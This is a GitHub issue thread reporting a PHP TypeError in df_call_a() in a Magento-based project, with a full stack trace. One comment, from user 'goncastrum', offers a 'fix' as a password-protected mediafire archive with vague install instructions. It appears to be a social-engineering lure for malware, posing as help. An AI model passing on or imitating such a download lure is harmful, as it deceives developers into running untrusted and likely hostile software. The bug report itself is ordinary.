### ISSUE TITLE
«df_call_a(): Argument #1 ($f) must be of type callable, array given, called in app/code/local/Df/Framework/lib/fs/path/ds/trim.php on line 9»

### ISSUE THREAD

**Issue by dmitrii-fediuk** [thehcginstitute-com/m1#671]
```
2024-09-01T21:00:36+00:00 ERR (3): 
TypeError: df_call_a(): Argument #1 ($f) must be of type callable, array given, called in app\code\local\Df\Framework\lib\fs\path\ds\trim.php on line 9 and defined in app\code\local\Df\Core\lib\lang\call.php:85
Stack trace:
#0 app\code\local\Df\Framework\lib\fs\path\ds\trim.php(9): df_call_a(Array, Object(Closure))
#1 app\code\local\Df\Framework\lib\fs\path\ds\cc.php(24): df_trim_ds(Array)
#2 app\code\local\Df\Framework\lib\fs\file\name.php(15): df_cc_path('C:/work/clients...', Array)
#3 app\code\local\Df\Qa\lib\log.php(140): df_file_name('C:/work/clients...', 'df-core-{date}-...')
#4 app\code\local\Df\Qa\lib\log.php(117): df_report('mage2.pro/df-co...', '[\n\tCustomer ID:...')
#5 app\code\local\Df\Qa\lib\log.php(75): df_log_l('Df_Core', Object(TypeError), Array)
#6 app\code\local\Df\Qa\Failure\Error.php(81): df_log(Object(TypeError))
#7 app\code\local\Df\Core\Boot.php(62): Df\Qa\Failure\Error::check()
#8 [internal function]: Df\Core\Boot::Df\Core\{closure}()
#9 {main}
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by dmitrii-fediuk** [comment]
Related to https://github.com/thehcginstitute-com/m1/issues/648
